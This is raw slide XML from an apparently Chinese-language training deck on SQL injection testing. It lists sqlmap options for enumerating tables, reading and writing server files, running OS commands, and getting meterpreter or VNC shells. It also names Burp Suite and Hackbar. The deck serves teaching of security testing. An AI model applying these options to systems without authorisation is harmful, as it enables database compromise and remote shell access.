                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Brute force(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>蛮力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这些选项可以被用来运行蛮力检查。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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common-tables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通用的表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="13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common-columns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通用的列名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184603808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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="4870757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>User-defined function injection(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用户自定义函数注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这些选项可以用来创建用户自定义函数。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">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udf-inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入用户自定义函数</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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shared-lib=SHLIB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>共享库的本地路径 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>File system access(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>访问文件系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这些选项可以被用来访问后端数据库管理系统的底层文件系统。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="12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file-read=RFILE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>从后端的数据库管理系统文件系统读取文件 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="12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file-write=WFILE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编辑后端的数据库管理系统文件系统上的本地文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="12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file-dest=DFILE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>后端的数据库管理系统写入文件的绝对路径 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331400349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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（选项）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF858B5-0EB5-7A45-9001-F7294CC5AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924313" y="1838066"/>
            <a:ext cx="10571973" cy="4870757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Operating system access(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>操作系统访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这些选项可以用于访问后端数据库管理系统的底层操作系统。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="12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os-cmd=OSCMD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行操作系统命令</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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os-shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>交互式的操作系统的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--os-pwn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>获取一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>OOB shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>VNC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--os-smbrelay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一键获取一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>OOB shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>VNC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>--os-bof </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>存储过程缓冲区溢出利用</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">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priv-esc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库进程用户权限提升</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:b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msf-path=MSFPATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Metasploit Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>本地的安装路径 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2600" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>tmp-path=TMPPATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>远程临时文件目录的绝对路径 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221350678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所需知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE3915F-2A63-1743-A167-096F6DE68D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1715770" y="2272975"/>
            <a:ext cx="8174990" cy="4455835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入检测）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>神器）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Hackbar</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>插件）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
